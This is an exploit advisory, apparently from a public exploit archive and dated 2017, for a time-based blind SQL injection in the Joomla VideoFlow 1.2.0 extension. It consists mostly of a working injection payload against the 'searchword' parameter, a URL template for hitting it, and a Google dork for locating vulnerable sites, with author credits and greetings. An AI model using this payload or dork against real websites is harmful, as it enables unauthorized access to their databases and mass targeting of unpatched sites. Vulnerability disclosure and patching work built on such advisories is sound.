Joomla VideoFlow 1.2.0 SQL Injection

Joomla VideoFlow extension version 1.2.0 suffers from a remote SQL injection vulnerability.


MD5 | e1e6be01340a32b2c077210cc558ab38

# Exploit Title: Joomla VideoFlow 1.2.0 - SQL Injection
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (Mojtaba Kazemi)
# Vendor Home : https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/videoflow/
# My Home : http://persian-team.ir/
# Google Dork : inurl:index.php?option=com_videoflow searchword
# Telegram Channel: @PersianHackTeam
# Tested on: Linux
# Date: 2017-05-23

# POC :
# SQL Injection :

Parameter: searchword (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: option=com_videoflow&task=search&vs=1&searchword=Tutorialaa') AND (SELECT * FROM (SELECT(SLEEP(5)))DBYE) AND ('bEOv'='bEOv&layout=listview&Itemid=2

http://server/index.php?option=com_videoflow&task=search&vs=1&searchword=[SQL]&layout=listview&Itemid=2

# Greetz : T3NZOG4N & FireKernel
# Iranian White Hat Hackers
# Chera Zang Nemizanid D:

Related Posts